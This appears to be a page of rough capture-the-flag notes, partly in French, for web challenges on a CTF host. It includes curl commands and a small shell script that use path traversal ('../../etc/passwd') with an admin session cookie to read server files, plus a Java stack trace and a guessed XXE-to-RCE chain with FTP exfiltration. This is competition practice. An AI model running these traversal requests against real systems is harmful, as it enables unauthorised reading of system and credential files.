HackMD - Collaborative Markdown Knowledge Base

./prefix-lol ./prefix ./prefix/lol ``` / -> 500 ./ -> 500 ../ -> 500 a/ -> 500 l/ol -> 500 ``` ``` curl -v 'http://web-emeraldrush.ctfz.one/files' --compressed -H 'Cookie: session=eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyX2lkIjoxNTEsImlzX2FkbWluIjp0cnVlLCJleHAiOjE1NzUyMzUzMDZ9.ItQyHgbzzVIArM5QkTpqC6eBu6a1xAWsXuP12Lpupy7r8c54GzESKpxywtHOZVbdCh1uSQ15P65vpGKGJeSIZuFtznqSHyFCRI20pOGiYcpr9hcIARgueRJj3ADLtIbs1x206FP-xv-T4dIjVLAOZHbsP-ZGAOqPNKNzZn4T6Q0FR3lByZtYN3XTyYjP9VWX8ew188TqkTB-TScu7CHXaZd7pS4RbteF1xxh7COLUBU_XgsmNUvM1CD51BgWtkp-h0f_yHiVpgQItTOA9tRSxS5XAyk7xDA17WpgOUhe3nZOxXxMPOh6gMF8S3i_PwFDsd2v1RCIixPmvlRmAh4zMQ' -F "file=@/home/user/EICAR;filename=..................etcpasswd" ``` ``` curl -v 'http://web-emeraldrush.ctfz.one/files' --compressed -H 'Cookie: session=eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyX2lkIjoxNTEsImlzX2FkbWluIjp0cnVlLCJleHAiOjE1NzUyMzUzMDZ9.ItQyHgbzzVIArM5QkTpqC6eBu6a1xAWsXuP12Lpupy7r8c54GzESKpxywtHOZVbdCh1uSQ15P65vpGKGJeSIZuFtznqSHyFCRI20pOGiYcpr9hcIARgueRJj3ADLtIbs1x206FP-xv-T4dIjVLAOZHbsP-ZGAOqPNKNzZn4T6Q0FR3lByZtYN3XTyYjP9VWX8ew188TqkTB-TScu7CHXaZd7pS4RbteF1xxh7COLUBU_XgsmNUvM1CD51BgWtkp-h0f_yHiVpgQItTOA9tRSxS5XAyk7xDA17WpgOUhe3nZOxXxMPOh6gMF8S3i_PwFDsd2v1RCIixPmvlRmAh4zMQ' -G --data-urlencode 'filename=../../../../../../../../../etc/passwd' ``` ```sh= FILENAME=$1 FILENAME_CLEAN=$(echo $FILENAME | tr -d '/') curl -v 'http://web-emeraldrush.ctfz.one/files' --compressed -H 'Cookie: session=eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyX2lkIjoxNTEsImlzX2FkbWluIjp0cnVlLCJleHAiOjE1NzUyMzUzMDZ9.ItQyHgbzzVIArM5QkTpqC6eBu6a1xAWsXuP12Lpupy7r8c54GzESKpxywtHOZVbdCh1uSQ15P65vpGKGJeSIZuFtznqSHyFCRI20pOGiYcpr9hcIARgueRJj3ADLtIbs1x206FP-xv-T4dIjVLAOZHbsP-ZGAOqPNKNzZn4T6Q0FR3lByZtYN3XTyYjP9VWX8ew188TqkTB-TScu7CHXaZd7pS4RbteF1xxh7COLUBU_XgsmNUvM1CD51BgWtkp-h0f_yHiVpgQItTOA9tRSxS5XAyk7xDA17WpgOUhe3nZOxXxMPOh6gMF8S3i_PwFDsd2v1RCIixPmvlRmAh4zMQ' -F "file=@/tmp/a;filename=$FILENAME_CLEAN" &>/dev/null curl -v 'http://web-emeraldrush.ctfz.one/files' --compressed -H 'Cookie: session=eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyX2lkIjoxNTEsImlzX2FkbWluIjp0cnVlLCJleHAiOjE1NzUyMzUzMDZ9.ItQyHgbzzVIArM5QkTpqC6eBu6a1xAWsXuP12Lpupy7r8c54GzESKpxywtHOZVbdCh1uSQ15P65vpGKGJeSIZuFtznqSHyFCRI20pOGiYcpr9hcIARgueRJj3ADLtIbs1x206FP-xv-T4dIjVLAOZHbsP-ZGAOqPNKNzZn4T6Q0FR3lByZtYN3XTyYjP9VWX8ew188TqkTB-TScu7CHXaZd7pS4RbteF1xxh7COLUBU_XgsmNUvM1CD51BgWtkp-h0f_yHiVpgQItTOA9tRSxS5XAyk7xDA17WpgOUhe3nZOxXxMPOh6gMF8S3i_PwFDsd2v1RCIixPmvlRmAh4zMQ' -G --data-urlencode "filename=$FILENAME" --output - ``` ## Catcontrol ``` "http-8080-133" daemon prio=5 RUNNABLE java.net.SocketInputStream.socketRead0(Native Method) java.net.SocketInputStream.socketRead(SocketInputStream.java:116) java.net.SocketInputStream.read(SocketInputStream.java:170) java.net.SocketInputStream.read(SocketInputStream.java:141) java.io.BufferedInputStream.fill(BufferedInputStream.java:246) java.io.BufferedInputStream.read(BufferedInputStream.java:265) java.io.FilterInputStream.read(FilterInputStream.java:83) com.sun.org.apache.xerces.internal.impl.XMLEntityManager$RewindableInputStream.read(XMLEntityManager.java:2892) com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:673) com.sun.org.apache.xerces.internal.impl.XMLEntityManager.startEntity(XMLEntityManager.java:1300) com.sun.org.apache.xerces.internal.impl.XMLEntityManager.startEntity(XMLEntityManager.java:1237) com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.startPE(XMLDTDScannerImpl.java:707) com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.skipSeparator(XMLDTDScannerImpl.java:2073) com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDecls(XMLDTDScannerImpl.java:2036) com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDTDInternalSubset(XMLDTDScannerImpl.java:362) com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.dispatch(XMLDocumentScannerImpl.java:1103 com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.next(XMLDocumentScannerImpl.java:1050) com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$PrologDriver.next(XMLDocumentScannerImpl.java:938) com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.next(XMLDocumentScannerImpl.java:606) com.sun.org.apache.xerces.internal.impl.XMLNSDocumentScannerImpl.next(XMLNSDocumentScannerImpl.java:117) com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl.next(XMLStreamReaderImpl.java:558) com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl.nextTag(XMLStreamReaderImpl.java:1238) net.bull.javamelody.PayloadNameRequestWrapper.parseSoapMethodName(PayloadNameRequestWrapper.java:248) net.bull.javamelody.PayloadNameRequestWrapper.initialize(PayloadNameRequestWrapper.java:104) net.bull.javamelody.MonitoringFilter.createRequestWrapper(MonitoringFilter.java:334) net.bull.javamelody.MonitoringFilter.doFilter(MonitoringFilter.java:225) net.bull.javamelody.MonitoringFilter.doFilter(MonitoringFilter.java:215) org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235) org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206) org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:233) org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:191) org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102) org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109) org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:299) org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:857) org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:588) org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:489) java.lang.Thread.run(Thread.java:745) ``` Stack trace utilisée par un type qui a pwn ? XXE -> ??? -> RCE Beaucoup de FTP dans les logs ``` sun.net.ftp.impl.FtpClient.openDataConnection(FtpClient.java:769) sun.net.ftp.impl.FtpClient.getFileStream(FtpClient.java:1283) sun.net.www.protocol.ftp.FtpURLConnection.getInputStream(FtpURLConnection.java:428) ```